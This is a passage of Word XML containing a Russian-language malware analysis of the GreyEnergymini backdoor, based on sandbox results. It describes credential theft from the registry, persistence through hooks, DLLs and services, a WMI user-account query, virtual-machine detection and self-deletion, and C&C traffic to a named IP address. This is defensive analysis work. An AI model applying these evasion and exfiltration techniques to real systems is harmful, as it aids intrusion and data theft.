    <w:p w14:paraId="1628F8ED" w14:textId="7190A972" w:rsidR="00BC502B" w:rsidRDefault="00BC502B" w:rsidP="00BC502B">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc214273118"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GreyEnergymini.bin</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="55C17A2A" w14:textId="40357A38" w:rsidR="00BC502B" w:rsidRDefault="00BC502B" w:rsidP="00BC502B">
      <w:r>
        <w:t xml:space="preserve">Следующим выбранным для анализа файла стал </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GreyEnergymini</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC502B">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC502B">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Вероятно, он представляет собой пародию на исполняемый вредоносный </w:t>
      </w:r>
      <w:r w:rsidRPr="00B959DE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TVUNSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC502B">
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B959DE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, загружаемый при запуске документа </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC502B">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>doc</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC502B">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F893ED" w14:textId="77777777" w:rsidR="00501D3F" w:rsidRDefault="004E5D3A" w:rsidP="00501D3F">
      <w:r>
        <w:t xml:space="preserve">В первую очередь также проанализируем сначала файл через виртуальную песочницу </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="00501D3F" w:rsidRPr="007E3389">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
          </w:rPr>
          <w:t>https://hybrid-analysis.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="625A7AE0" w14:textId="5062372A" w:rsidR="00260B4F" w:rsidRPr="0035075D" w:rsidRDefault="00260B4F" w:rsidP="00260B4F">
      <w:r>
        <w:t>Благ</w:t>
      </w:r>
      <w:r w:rsidR="00DE7BBB">
        <w:t>одаря сайту выяснилось, что тип</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> файла – исполняемый .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EXE</w:t>
      </w:r>
      <w:r w:rsidRPr="00260B4F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Win</w:t>
      </w:r>
      <w:r w:rsidRPr="00260B4F">
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidR="005C7A1F">
        <w:t xml:space="preserve">. По сути, файл </w:t>
      </w:r>
      <w:r w:rsidR="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GreyEnergymini</w:t>
      </w:r>
      <w:r w:rsidR="005C7A1F" w:rsidRPr="005C7A1F">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidR="005C7A1F" w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005C7A1F">
        <w:t xml:space="preserve">представляет собой мини версию бэкдора, который маскируется под легитимный процесс, запускается в системе, крадет данные и отправляет и получает запросы на </w:t>
      </w:r>
      <w:r w:rsidR="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="005C7A1F" w:rsidRPr="005C7A1F">
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidR="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="005C7A1F">
        <w:t>-сервис</w:t>
      </w:r>
      <w:r w:rsidR="0035075D" w:rsidRPr="0035075D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005C7A1F">
        <w:t xml:space="preserve"> По общей классификации рисков </w:t>
      </w:r>
      <w:r w:rsidR="00DE7BBB">
        <w:t xml:space="preserve">по отчету виртуальной песочницы </w:t>
      </w:r>
      <w:r w:rsidR="005C7A1F">
        <w:t>файл делает следующее</w:t>
      </w:r>
      <w:r w:rsidR="005C7A1F" w:rsidRPr="0035075D">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F36A468" w14:textId="179D81A2" w:rsidR="005C7A1F" w:rsidRPr="005C7A1F" w:rsidRDefault="005C7A1F" w:rsidP="005C7A1F">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r w:rsidRPr="00E9452C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Spyware</w:t>
      </w:r>
      <w:r w:rsidRPr="00E9452C">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="00E9452C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stealer</w:t>
      </w:r>
      <w:r w:rsidRPr="00E9452C">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00E9452C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Phishing</w:t>
      </w:r>
      <w:r w:rsidRPr="00E9452C">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve"> Файл пытается укра</w:t>
      </w:r>
      <w:r w:rsidR="00BA5DEF">
        <w:t>сть учётные данные</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC75F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mail</w:t>
      </w:r>
      <w:r w:rsidR="00DC75F7" w:rsidRPr="00816055">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve">из реестра </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve">. Например, он ищет ключи в реестре вроде </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HKCU</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Software</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CurrentVersion</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Internet</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Settings</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve"> (настройки интернета, включая прокси и кэш).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4E0E43" w14:textId="61A974BD" w:rsidR="005C7A1F" w:rsidRPr="005C7A1F" w:rsidRDefault="005C7A1F" w:rsidP="005C7A1F">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r w:rsidRPr="00E9452C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Persistence</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve">: Устанавливает "хуки" (перехватчики, которые модифицируют поведение других процессов) в запущенные процессы, дропает (сбрасывает) </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t>-файлы (</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dynamic</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Link</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Library</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve"> — библиотеки кода, которые могут запускаться внутри других программ) и создаёт сервисы (службы </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve">, которые работают в фоне). Это позволяет </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">вредоносному файлу </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t>"выживать" после перезагрузки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3385EA25" w14:textId="18143FDF" w:rsidR="005C7A1F" w:rsidRPr="005C7A1F" w:rsidRDefault="005C7A1F" w:rsidP="005C7A1F">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r w:rsidRPr="00E9452C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fingerprint</w:t>
      </w:r>
      <w:r w:rsidRPr="00E9452C">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve"> Выполняет </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WMI</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t>-запросы (</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Management</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Instrumentation</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve"> — система для управления </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve">, позволяет запрашивать </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>info</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve"> о процессах, пользователях). Например, </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Caption</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Disabled</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Win</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t>32_</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UserAccount</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve"> — это запрос на имена пользователей и их статус. Также </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">проверяет настройки </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IE</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Internet</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Explorer</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t>) и кэш интернета, чтобы скрыть следы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3374640F" w14:textId="79785823" w:rsidR="005C7A1F" w:rsidRPr="005C7A1F" w:rsidRDefault="005C7A1F" w:rsidP="005C7A1F">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r w:rsidRPr="00E9452C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Evasive</w:t>
      </w:r>
      <w:r w:rsidRPr="00E9452C">
        <w:t xml:space="preserve"> (уклонение от обнаружения):</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve"> Проверяет сеть через </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve"> (команда для проверки соединения), выполняет </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WMI</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve"> для детекции </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VM</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve"> (если видит </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VMware</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VirtualBox</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve">, может самоудалиться, чтобы не попасть в анализ). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738B002D" w14:textId="766B2447" w:rsidR="005C7A1F" w:rsidRPr="005C7A1F" w:rsidRDefault="005C7A1F" w:rsidP="005C7A1F">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r w:rsidRPr="00E9452C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Network</w:t>
      </w:r>
      <w:r w:rsidRPr="00E9452C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E9452C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00E9452C">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve"> Контактирует с 2 хостами</w:t>
      </w:r>
      <w:r w:rsidR="0035075D">
        <w:t xml:space="preserve"> (см. рисунок 5)</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t>, в основном 217.12.204.100 на портах 80 (</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t>) и 443 (</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve">). Трафик без стандартных </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve">-заголовков — это маскировка под обычный веб-трафик, но на самом деле отправляет/получает данные (возможно, шифрованные </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XOR</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RC</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t xml:space="preserve">4). Опасно, потому что позволяет эксфильтрацию (выгрузку) данных на </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>-сервер.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64596FC3" w14:textId="77777777" w:rsidR="0035075D" w:rsidRDefault="0035075D" w:rsidP="0035075D">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="0035075D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52278248" wp14:editId="31F26B30">
            <wp:extent cx="5000625" cy="42052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738" cy="42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A411" w14:textId="473DDC4E" w:rsidR="00D56E94" w:rsidRDefault="0035075D" w:rsidP="0035075D">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035075D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="0035075D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0035075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35075D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5</w:t>
      </w:r>
      <w:r w:rsidRPr="0035075D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0035075D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Контактируемые хосты</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392EAE89" w14:textId="04A7EBBA" w:rsidR="0035075D" w:rsidRDefault="0035075D" w:rsidP="0035075D">
      <w:r>
        <w:t xml:space="preserve">Файл также запускает дочерние процессы (см. рисунок 6). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275AA063" w14:textId="77777777" w:rsidR="00A8418F" w:rsidRDefault="00A8418F" w:rsidP="00A8418F">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00A8418F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C7D634F" wp14:editId="2DA95DC4">
            <wp:extent cx="5424805" cy="17155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17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DA9" w14:textId="0302086B" w:rsidR="00A8418F" w:rsidRPr="00A8418F" w:rsidRDefault="00A8418F" w:rsidP="00A8418F">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A8418F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00A8418F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00A8418F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8418F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6</w:t>
      </w:r>
      <w:r w:rsidRPr="00A8418F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A8418F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Запуск дочерних процессов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589A9DB4" w14:textId="2D307237" w:rsidR="00EB26C0" w:rsidRPr="005E2F45" w:rsidRDefault="00EB26C0" w:rsidP="00EB26C0">
      <w:r>
        <w:t xml:space="preserve">Один из загружаемых файлов распознан как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB26C0">
        <w:t xml:space="preserve">32 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>execitable</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB26C0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(см. рисунок 7)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB26C0">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005E2F45" w:rsidRPr="005E2F45">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005E2F45">
        <w:t xml:space="preserve"> Видно (см. рисунок 6), что он загружается через создание системного процесса </w:t>
      </w:r>
      <w:r w:rsidR="005E2F45">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rundll</w:t>
      </w:r>
      <w:r w:rsidR="005E2F45" w:rsidRPr="005E2F45">
        <w:t>32.</w:t>
      </w:r>
      <w:r w:rsidR="005E2F45">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidR="005E2F45">
        <w:t xml:space="preserve">, который отвечает за запуск программ, находящихся в динамически подключаемых библиотеках. Поэтому при запуске на ВМ во время динамического анализа, необходимо будет извлечь и проанализировать дамп процесса </w:t>
      </w:r>
      <w:r w:rsidR="005E2F45">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rundll</w:t>
      </w:r>
      <w:r w:rsidR="005E2F45" w:rsidRPr="005E2F45">
        <w:t>32.</w:t>
      </w:r>
      <w:r w:rsidR="005E2F45">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidR="005E2F45" w:rsidRPr="005E2F45">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5806F539" w14:textId="77777777" w:rsidR="004C496A" w:rsidRDefault="004C496A" w:rsidP="004C496A">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="004C496A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74F46BE2" wp14:editId="4978CB91">
            <wp:extent cx="4718792" cy="1990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8792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4CD5" w14:textId="6E5AB09A" w:rsidR="00EB26C0" w:rsidRPr="004C496A" w:rsidRDefault="004C496A" w:rsidP="004C496A">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C496A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="004C496A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="004C496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C496A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7</w:t>
      </w:r>
      <w:r w:rsidRPr="004C496A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009A68B4">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="004C496A">
        <w:rPr>
          <w:b w:val="0"/>
